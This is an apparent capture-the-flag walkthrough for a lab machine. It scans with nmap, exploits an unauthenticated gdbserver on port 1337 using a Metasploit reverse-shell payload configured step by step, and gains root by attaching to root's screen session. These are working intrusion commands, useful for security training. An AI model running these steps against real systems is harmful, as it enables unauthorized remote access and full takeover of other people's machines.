Let's start with an nmap scan:
nmap -sC -sV -p- targetIP
-p- means scan all 65535 TCP ports (a default scan only covers the 1000 most common ones), -sC runs the default scripts and -sV probes the service version on each open port.
We find port 1337 open.
Service detection identifies the service on port 1337 as gdbserver, the GDB remote debugging server.
A gdbserver exposed on the network is a known problem: it has no authentication, so any client that connects can write memory and run code in the debugged process. There is an exploit for this:
Let's load Metasploit and configure the module:
We need to set RHOSTS (the remote host) to the IP of the target machine:
set RHOSTS 10.129.96.68
RPORT (the remote port) should be 1337, where gdbserver is listening:
set RPORT 1337
We need to set LHOST (the local host) to the IP of our own machine, the one the reverse shell will connect back to. If you don't know your IP, run ifconfig (or ip a) and use the address of the VPN interface:
set LHOST 10.10.14.21
We also need to set the payload. By default it is linux/x86/meterpreter/reverse_tcp, but the target is 64-bit,
so we change it to linux/x64/meterpreter/reverse_tcp:
set payload linux/x64/meterpreter/reverse_tcp
For the same reason we need to change the target ID. By default it is target 0, x86 (32-bit);
we need target 1, x86_64 (64-bit), so that the module sends the right architecture of payload:
set target 1
Now let's check that everything is configured properly:
Let's run the exploit. Once we have a shell on the target, we upgrade it to a proper interactive TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
We got the user flag!
Let's try the usual first privilege-escalation check:
It asks for the user's password, which we don't have:
Another thing to look for is a screen session belonging to root that we are allowed to attach to. Let's try:
/usr/bin/screen -x root/root
-x attaches to a session that is still attached elsewhere, and root/root selects the session named "root" owned by the user root. This only works because such a session exists and screen allows us to attach to it (attaching to another user's session requires that session to be in multiuser mode), but when it does, we inherit root's shell.
We are now root!
We got the root flag!